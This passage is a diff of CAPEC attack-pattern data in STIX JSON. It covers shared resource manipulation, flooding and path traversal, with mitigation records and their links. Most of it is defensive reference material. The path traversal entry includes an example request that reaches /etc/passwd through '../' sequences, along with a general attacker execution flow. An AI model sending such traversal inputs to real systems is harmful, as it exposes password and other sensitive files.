"2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b2e47286-34b7-484e-a95b-67f1b21ae24b", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--69611262-87d4-4bba-8db4-068c40577c4c", + "spec_version": "2.1", + "target_ref": "attack-pattern--476ca631-2695-43f8-82f6-83c06a07ae36", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a resource shared between multiple applications, an application pool or hardware pin multiplexing to affect behavior. Resources may be shared between multiple applications or between multiple threads of a single application. Resource sharing is usually accomplished through mutual access to a single memory location or multiplexed hardware pins. If an adversary can manipulate this shared resource (usually by co-opting one of the applications or threads) the other applications or threads using the shared resource will often continue to trust the validity of the compromised shared resource and use it in their calculations. This can result in invalid trust assumptions, corruption of additional data through the normal operations of the other users of the shared resource, or even cause a crash or compromise of the sharing applications.", + "external_references": [ + { + "external_id": "CAPEC-124", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/124.html" + }, + { + "external_id": "CWE-1189", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1189.html" + }, + { + "external_id": "CWE-1331", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1331.html" + } + ], + "id": "attack-pattern--d5e0c12f-6086-491d-86e5-e10a14d1f947", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Shared Resource Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_prerequisites": [ + "The target applications, threads or functions must share resources between themselves.", + "The adversary must be able to manipulate some piece of the shared resource either directly or indirectly and the other users of the data must accept the changed data as valid. Usually this requires that the adversary be able to compromise one of the sharing applications or threads in order to manipulate the shared data." + ], + "x_capec_resources_required": [ + "None: The attacker does not need any specialized resources to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary consumes the resources of a target by rapidly engaging in a large number of interactions with the target. This type of attack generally exposes a weakness in rate limiting or flow. When successful this attack prevents legitimate users from accessing the service and can cause the target to crash. This attack differs from resource depletion through leaks or allocations in that the latter attacks do not rely on the volume of requests made to the target but instead focus on manipulation of the target's operations. The key factor in a flooding attack is the number of requests the adversary can make in a given period of time. The greater this number, the more likely an attack is to succeed against a given target.", + "external_references": [ + { + "external_id": "CAPEC-125", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/125.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Network Denial of Service: Direct Network Flood", + "external_id": "T1498.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1498/001" + }, + { + "description": "Endpoint Denial of Service", + "external_id": "T1499", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499" + }, + { + "description": "Denial of Service", + "external_id": "10", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Denial-of-Service" + }, + { + "description": "Traffic flood", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Traffic_flood" + } + ], + "id": "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Flooding", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (A successful flooding attack compromises the availability of the target system's service by exhausting its available resources.)", + "Resource Consumption (A successful flooding attack compromises the availability of the target system's service by exhausting its available resources.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--172e2289-333b-4796-9afd-94140c9480e8", + "attack-pattern--bb4d350b-c500-45d6-97c2-c0adccbe6bad", + "attack-pattern--2e017307-7bab-419b-972c-8dae9e089572", + "attack-pattern--d43c7ffa-16a5-4eb9-8c29-3391cc7ff269", + "attack-pattern--f30a7c37-4d87-41d2-a103-c995948076f3", + "attack-pattern--e68b5623-7a7a-45f8-896f-12b38bedc838", + "attack-pattern--ad3913be-6ca6-48e6-9e3b-7b67e4162612", + "attack-pattern--c3ce7043-a2cc-4686-945c-cf3b605b7c90" + ], + "x_capec_prerequisites": [ + "Any target that services requests is vulnerable to this attack on some level of scale." + ], + "x_capec_resources_required": [ + "A script or program capable of generating more requests than the target can handle, or a network or cluster of objects all capable of making simultaneous requests." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that protocols have specific limits of scale configured.", + "id": "course-of-action--55bca578-149c-4129-a003-3c2d5bd54b5b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-125-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--22178117-f064-4303-8985-7fd9ee2fe9d8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--55bca578-149c-4129-a003-3c2d5bd54b5b", + "spec_version": "2.1", + "target_ref": "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Specify expectations for capabilities and dictate which behaviors are acceptable when resource allocation reaches limits.", + "id": "course-of-action--c8dd811c-2eb5-418e-aeda-80170abad702", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-125-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f0a57d15-98a3-44ab-9dee-7451762bc00b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c8dd811c-2eb5-418e-aeda-80170abad702", + "spec_version": "2.1", + "target_ref": "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Uniformly throttle all requests in order to make it more difficult to consume resources more quickly than they can again be freed.", + "id": "course-of-action--6c5ef0e0-77e5-40d3-85bf-7c50693c211d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-125-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--22e10e44-9d16-4de8-9376-289ccde29247", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6c5ef0e0-77e5-40d3-85bf-7c50693c211d", + "spec_version": "2.1", + "target_ref": "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses path manipulation methods to exploit insufficient input validation of a target to obtain access to data that should be not be retrievable by ordinary well-formed requests. A typical variety of this attack involves specifying a path to a desired file together with dot-dot-slash characters, resulting in the file access API or function traversing out of the intended directory structure and into the root file system. By replacing or modifying the expected path information the access function or API retrieves the file desired by the attacker. These attacks either involve the attacker providing a complete path to a targeted file or using control characters (e.g. path separators (/ or \\) and/or dots (.)) to reach desired directories or files.", + "external_references": [ + { + "external_id": "CAPEC-126", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/126.html" + }, + { + "external_id": "CWE-22", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html" + }, + { + "description": "Path Traversal", + "external_id": "33", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Path-Traversal" + }, + { + "description": "Path Traversal", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Path_Traversal" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "OWASP Testing Guide (v4), 2010, The Open Web Application Security Project (OWASP)", + "external_id": "REF-9", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/index.php/Testing_for_Path_Traversal_(OWASP-AZ-001)" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-10", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/w/page/13246952/Path-Traversal" + } + ], + "id": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Path Traversal", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "Directory Traversal" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642" + ], + "x_capec_child_of_refs": [ + "attack-pattern--71d31712-9174-4433-8e4f-8520a3ec1249" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Unreliable Execution (The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software.)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Read Data (The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Modify Data (The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An example of using path traversal to attack some set of resources on a web server is to use a standard HTTP request\n http://example/../../../../../etc/passwd\n From an attacker point of view, this may be sufficient to gain access to the password file on a poorly protected system. If the attacker can list directories of critical resources then read only access is not sufficient to protect the system.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Fingerprinting of the operating system: In order to perform a valid path traversal, the attacker needs to know what the underlying OS is so that the proper file seperator is used.

    2. Techniques
    Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
    TCP/IP Fingerprinting. The attacker uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.
    Induce errors to find informative error messages

  2. Survey the Application to Identify User-controllable Inputs: The attacker surveys the target application to identify all user-controllable file inputs

Experiment

  1. Vary inputs, looking for malicious results: Depending on whether the application being exploited is a remote or local one, the attacker crafts the appropriate malicious input containing the path of the targeted file or other file system control syntax to be passed to the application

Exploit

  1. Manipulate files accessible by the application: The attacker may steal information or directly manipulate files (delete, copy, flush, etc.)

", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62" + ], + "x_capec_prerequisites": [ + "The attacker must be able to control the path that is requested of the target.", + "The target must fail to adequately sanitize incoming paths" + ], + "x_capec_resources_required": [ + "The ability to manually manipulate path information either directly through a client application relative to the service or application or via a proxy application." + ], + "x_capec_skills_required": { + "Low": "Simple command line attacks or to inject the malicious payload in a web page.", + "Medium": "Customizing attacks to bypass non trivial filters in the application." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Configure the access control correctly.", + "id": "course-of-action--49faa4e3-77fa-4b56-8186-be9d4302e09a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--990d82cc-54c9-4536-8db1-9e1e4d3c1162", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--49faa4e3-77fa-4b56-8186-be9d4302e09a", + "spec_version": "2.1", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Enforce principle of least privilege.", + "id": "course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fc0b9ea2-577b-4cae-a52b-606ae9ea8f84", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135", + "spec_version": "2.1", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Execute programs with constrained privileges, so parent process does not open up further vulnerabilities. Ensure that all directories, temporary directories and files, and memory are executing with limited privileges to protect against remote execution.", + "id": "course-of-action--59bcc683-a1e5-4b88-9821-ddb734003114", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--594c4c5a-1764-41b8-91aa-dc032c6ae92a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--59bcc683-a1e5-4b88-9821-ddb734003114", + "spec_version": "2.1", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement.", + "id": "course-of-action--6a928417-72f9-4429-951c-8dcaca5edc6d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f114c5f3-cfbd-4300-b255-e4bfeb5672be", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6a928417-72f9-4429-951c-8dcaca5edc6d", + "spec_version": "2.1", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Proxy communication to host, so that communications are terminated at the proxy, sanitizing the requests before forwarding to server host.", + "id": "course-of-action--da440d05-dc0e-4bfa-8490-7178ae419336", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9efb30cd-a0e5-4666-998f-c9119096f678", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--da440d05-dc0e-4bfa-8490-7178ae419336", + "spec_version": "2.1", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands.", + "id": "course-of-action--16c78c78-dace-4fe3-ac4a-aaf188d14af5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2aeb9107-ab93-4c87-b9c5-a7eabd78976b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--16c78c78-dace-4fe3-ac4a-aaf188d14af5", + "spec_version": "2.1", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Host integrity monitoring for critical files, directories, and processes. The goal of host integrity monitoring is to be aware when a security issue has occurred so that incident response and other forensic activities can begin.", + "id": "course-of-action--3c433a52-7784-4abd-b404-41fc8a423886", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f7a2a574-4587-4e1f-83a1-69fa413c6fbb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3c433a52-7784-4abd-b404-41fc8a423886", + "spec_version": "2.1", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Perform input validation for all remote content, including remote and user-generated content.", + "id": "course-of-action--b3379e8f-995d-4df7-be15-7861c104b55c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a6a7d0d3-2377-4fba-ba62-ba4c605a8206", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b3379e8f-995d-4df7-be15-7861c104b55c", + "spec_version": "2.1", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables.", + "id": "course-of-action--8fb32cf0-80fd-4e8b-91c6-0908041d5b6e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-8", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--99e79d18-12bf-4362-a63b-bbc4e4c958a5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8fb32cf0-80fd-4e8b-91c6-0908041d5b6e", + "spec_version": "2.1", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use indirect references rather than actual file names.", + "id": "course-of-action--f972cf8f-5c89-4e6c-87ad-8eb40c32883b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-9", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--233f668e-d39a-47dd-8b8e-51d1e88576f6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f972cf8f-5c89-4e6c-87ad-8eb40c32883b", + "spec_version": "2.1", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use possible permissions on file access when developing and deploying web applications.", + "id": "course-of-action--4dc38767-be73-424a-b909-90eb4773dfa3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-10", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--048fb2e5-4985-4092-ab1f-ecb8bb25b6c2", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4dc38767-be73-424a-b909-90eb4773dfa3", + "spec_version": "2.1", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Validate user input by only accepting known good. Ensure all content that is delivered to client is sanitized against an acceptable content specification -- using an allowlist approach.", + "id": "course-of-action--eb88c845-46c6-4223-adf2-ac06a363bac2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-11", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d5c7f3e3-935d-41f4-b489-634a196c7864", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--eb88c845-46c6-4223-adf2-ac06a363bac2", + "spec_version": "2.1", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary crafts a request to a target that results in the target listing/indexing the content of a directory as output. One common method of triggering directory contents as output is to construct a request containing a path that terminates in a directory name rather than a file name since many applications are configured to provide a list of the directory's contents when such a request is received. An adversary can use this to explore the directory tree on a target as well as learn the names of files. This can often end up revealing test files, backup files, temporary files, hidden files, configuration files, user accounts, script contents, as well as naming conventions, all of which can be used by an attacker to mount additional attacks.", + "external_references": [ + { + "external_id": "CAPEC-127", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/127.html" + }, + { + "external_id": "CWE-424", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/424.html" + }, + { + "external_id": "CWE-425", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/425.html" + }, + { + "external_id": "CWE-288", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/288.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "external_id": "CWE-276", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/276.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "File and Directory Discovery", + "external_id": "T1083", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1083" + 